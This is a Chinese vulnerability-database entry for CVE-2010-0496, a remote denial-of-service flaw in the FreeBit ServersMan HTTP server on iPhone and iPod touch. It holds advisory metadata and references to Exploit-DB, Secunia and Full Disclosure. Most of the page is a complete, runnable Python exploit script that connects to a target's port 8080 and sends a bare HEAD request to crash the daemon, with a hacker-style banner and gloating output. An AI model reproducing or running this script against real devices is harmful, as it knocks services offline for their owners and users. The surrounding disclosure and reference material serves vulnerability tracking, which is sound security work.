FreeBit ServersMan服务器 HEAD请求拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118948 漏洞类型 输入验证
发布时间 2010-01-27 更新时间 2010-02-05
CVE编号 CVE-2010-0496 CNNVD-ID CNNVD-201002-024
漏洞平台 iOS CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/11273
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201002-024
|漏洞详情
ServersMan是日本FreeBit公司开发的用于为iPhone手机提供完整网络功能的服务器。运行在iPodtouch上的AppleiPhoneOS操作系统的FreeBitServersMan服务器存在HEAD请求拒绝服务攻击漏洞。远程攻击者可以借助一个对/URI的HEAD请求,导致服务拒绝(守护进程崩溃)。
|漏洞EXP
#!/usr/bin/python
#
# Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS exploit
# Found by: Steven Seeley (mr_me) seeleymagic [at] hotmail [dot] com
# Homepage: http://serversman.com/index_en.jsp
# Download: From the app store (Free - use your Itunes account)
# Tested on: Iphone 3G - firmware 3.1.2 (Darwin kernel)
# Greetz: corelanc0d3r, EdiStrosar, rick2600, ekse, MarkoT, sinn3r & Jacky from Corelan Team
# Special Greetz to TecR0c!
#

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DOS exploit"

import socket
import sys

def Usage():
    print ("Usage: ./serversman.py <serv_ip>\n")
    print ("Example: ./serversman.py 192.168.48.183\n")
if len(sys.argv) <> 2:
        Usage()
        sys.exit(1)
else:
    hostname = sys.argv[1]
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 8080))
	print "[+] Connecting to the target.."
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    print "[+] Sending payload.. muhaha ph33r"
    sock.send("HEAD / HTTP/1.0\r\n\r\n")
    r=sock.recv(1024)
    sock.close()
    print "[+] HTTP Server is now DoSed!"
    sys.exit(0);
|参考资料

来源:XF
名称:serversman-iphone-ipod-dos(55949)
链接:http://xforce.iss.net/xforce/xfdb/55949
来源:SECUNIA
名称:38315
链接:http://secunia.com/advisories/38315
来源:FULLDISC
名称:20100127AppleIphone/Ipod-Serversman3.1.5HTTPRemoteDoSexploit
链接:http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0580.html